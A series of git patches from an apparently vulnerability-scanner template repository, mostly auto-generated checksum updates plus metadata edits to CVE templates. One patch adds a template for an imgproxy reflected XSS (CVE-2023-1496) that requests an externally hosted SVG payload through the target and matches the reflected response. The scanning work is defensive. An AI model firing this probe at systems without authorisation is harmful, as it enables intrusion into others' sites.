-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6476,7 +6476,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:af8de52a2ab79abd75a12ca15e51558bf4e897dd +templates-checksum.txt:f5966c91dcf8e5f3a6561dfcb2d1e2d1dc05228e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 8106624b5b1af0d99fed0587da71f98612192015 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 12:34:11 +0000 Subject: [PATCH 236/609] Auto Generated Templates Checksum [Sat Jul 1 12:34:11 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d059da4668..561e61c773 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2117,7 +2117,7 @@ http/cves/2022/CVE-2022-34753.yaml:92f76f9bcdc43baee8494459a0260da840b64e5a http/cves/2022/CVE-2022-3484.yaml:e875835be6a127b65d965de09ad877f474b14119 http/cves/2022/CVE-2022-3506.yaml:a1ea33d0f67db2dcbe88082cbb15a5749e609f4b http/cves/2022/CVE-2022-35151.yaml:c0776a0afb8ca4469508dae79dc67197d0d76ed8 -http/cves/2022/CVE-2022-35405.yaml:7af2589dcf827962fb92f420f82c02071c7c6c13 +http/cves/2022/CVE-2022-35405.yaml:8129a3cd67ce4f293372210ffdfc3051f535873d http/cves/2022/CVE-2022-35413.yaml:389e328e2fa1529d523764060da0b96d071fe4b7 http/cves/2022/CVE-2022-35416.yaml:68e74086a61984ecc5244aa94e83543ae6850f62 http/cves/2022/CVE-2022-35493.yaml:d24b8be7b1c43c874aee1c96adb259d5eb5da8f4 @@ -6476,7 +6476,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:f5966c91dcf8e5f3a6561dfcb2d1e2d1dc05228e +templates-checksum.txt:12e23f688d402122bc2c0dea538d289b66a8679d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 6c021afe104c3917ba733a0ae338f88ac843e263 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 12:35:32 +0000 Subject: [PATCH 237/609] TemplateMan Update [Sat Jul 1 12:35:32 UTC 2023] :robot: --- http/cves/2022/CVE-2022-35405.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 2261d3053d..cdc4f6c82f 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-35405 epss-score: 0.97399 metadata: - max-request: 4 + max-request: 1 shodan-query: http.title:"ManageEngine" tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev From 022b5d9754c19234df183eed282c0581be6027bf Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 1 Jul 2023 18:45:49 +0530 Subject: [PATCH 238/609] Added CVE-2023-1496 (#7589) * Create CVE-2023-1496.yaml Added Imgproxy < 3.14.0 - Cross-site Scripting (XSS) - CVE-2023-1496 * added xss payload --------- Co-authored-by: Dhiyaneshwaran --- http/cves/2023/CVE-2023-1496.yaml | 39 +++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2023/CVE-2023-1496.yaml diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml new file mode 100644 index 0000000000..7ea435252d --- /dev/null +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-1496 + +info: + name: Imgproxy < 3.14.0 - Cross-site Scripting (XSS) + author: pdteam + severity: medium + description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0. + reference: + - https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689 + - https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-1496 + cwe-id: CWE-79 + epss-score: 0.00051 + cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + shodan-query: "Server: imgproxy" + tags: cve,cve2023,imgproxy,xss,svg + +http: + - method: GET + path: + - "{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg" + + matchers: + - type: dsl + dsl: + - contains(body, 'PC9zdmc+#test') + - status_code == 200 + condition: and + + extractors: + - type: dsl + dsl: + - content_security_policy From 9f010957d7e4fbdaf0e212fce84de49daa02bfc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:16:09 +0000 Subject: [PATCH 239/609] Auto Generated New Template Addition List [Sat Jul 1 13:16:09 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6fbfdf61d8..d488975828 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/cves/2023/CVE-2023-0126.yaml http/cves/2023/CVE-2023-0562.yaml http/cves/2023/CVE-2023-0563.yaml http/cves/2023/CVE-2023-1454.yaml +http/cves/2023/CVE-2023-1496.yaml http/cves/2023/CVE-2023-20888.yaml http/cves/2023/CVE-2023-20889.yaml http/cves/2023/CVE-2023-24488.yaml From b690dc9f149cedce3a1640322149aa32f12032f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:16:17 +0000 Subject: [PATCH 240/609] Auto Generated Templates Checksum [Sat Jul 1 13:16:17 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 561e61c773..485629c200 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2117,7 +2117,7 @@ http/cves/2022/CVE-2022-34753.yaml:92f76f9bcdc43baee8494459a0260da840b64e5a http/cves/2022/CVE-2022-3484.yaml:e875835be6a127b65d965de09ad877f474b14119 http/cves/2022/CVE-2022-3506.yaml:a1ea33d0f67db2dcbe88082cbb15a5749e609f4b http/cves/2022/CVE-2022-35151.yaml:c0776a0afb8ca4469508dae79dc67197d0d76ed8 -http/cves/2022/CVE-2022-35405.yaml:8129a3cd67ce4f293372210ffdfc3051f535873d +http/cves/2022/CVE-2022-35405.yaml:2c1fff124b2202fbafdd4d9e6c34736a6bdc0261 http/cves/2022/CVE-2022-35413.yaml:389e328e2fa1529d523764060da0b96d071fe4b7 http/cves/2022/CVE-2022-35416.yaml:68e74086a61984ecc5244aa94e83543ae6850f62 http/cves/2022/CVE-2022-35493.yaml:d24b8be7b1c43c874aee1c96adb259d5eb5da8f4 @@ -2229,6 +2229,7 @@ http/cves/2023/CVE-2023-1177.yaml:db3b9a8ffe51ae45f082e3e39639a9910d1fe95e http/cves/2023/CVE-2023-1362.yaml:fc0a08215591665226c1a118990609422e8a8a0f http/cves/2023/CVE-2023-1434.yaml:a68d4a8bb2e0e74d8593a52664402abea29b7e68 http/cves/2023/CVE-2023-1454.yaml:a882db102c7370e2a8358c3b9f37ef4f25311c68 +http/cves/2023/CVE-2023-1496.yaml:f98a9ac2b8a977790ffb743b5c4d6f1c701f56f4 http/cves/2023/CVE-2023-1671.yaml:5cd17b9a51849bff7772e8791691be9008a559cc http/cves/2023/CVE-2023-20864.yaml:a942bfcf278ae2437eea0c21b1b7012f253528dd http/cves/2023/CVE-2023-20887.yaml:1f936b73c167d4086d2844cd9b2a3699d448c90d @@ -6476,7 +6477,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:12e23f688d402122bc2c0dea538d289b66a8679d +templates-checksum.txt:571db56718defcf3c46878ff7881bc496053e2db wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From da29c2006ed8446d272c37bcaa79042553ce9c18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jul 2023 13:26:42 +0000 Subject: [PATCH 242/609] Auto Generated Templates Checksum [Sat Jul 1 13:26:42 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 485629c200..6f191dcaf1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4912,7 +4912,7 @@ http/takeovers/aha-takeover.yaml:5ce44a67c1725b09dc2eea987d4da31ec43f44ae http/takeovers/airee-takeover.yaml:3fd80d628f4b563459299ad878a256358015f82f http/takeovers/anima-takeover.yaml:fa5a85318b320a4c4cd79d0b5c955352f0badc78 http/takeovers/announcekit-takeover.yaml:24610659f1545855c3ce01cfbfc31d3224df1634 -http/takeovers/aws-bucket-takeover.yaml:bb0255f61f283c264a1c3a42c54375d1874112a8 +http/takeovers/aws-bucket-takeover.yaml:0fa7671ae69602332e404137a957b5ac8d303a4a http/takeovers/bigcartel-takeover.yaml:d092cbe295a8fdac05088058e66f4decd80aa919 http/takeovers/bitbucket-takeover.yaml:fcf027f73f0bf36fb0701a2ccc9856d01768b0a0 http/takeovers/campaignmonitor-takeover.yaml:22826ba9f9e3c4fd742fe4325f5935f804b091f6 @@ -6477,7 +6477,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:571db56718defcf3c46878ff7881bc496053e2db +templates-checksum.txt:faf6f169e1757fc5fff2570f5e1c891281675005 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From f6dca2de16420efaef287583a5faf2d224c3950c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 1 Jul 2023 18:58:25 +0530 Subject: [PATCH 243/609] added metrics --- http/cves/2023/CVE-2023-34659.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index ee52efe52d..18f4154a1b 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -1,7 +1,7 @@ id: CVE-2023-34659 info: - name: Jeecg-boot 3.5.0 - SQL Injection + name: JeecgBoot 3.5.0 - SQL Injection author: ritikchaddha severity: critical description: | @@ -10,7 +10,10 @@ info: - https://github.com/jeecgboot/jeecg-boot/issues/4976 - https://nvd.nist.gov/vuln/detail/CVE-2023-34659 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-34659 + cwe-id: CWE-89 metadata: shodan-query: http.favicon.hash:1380908726 tags: cve,cve2023,jeecg,sqli From f0aef8c3b3f8c74a4ab49d14910f09a495a928e8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: 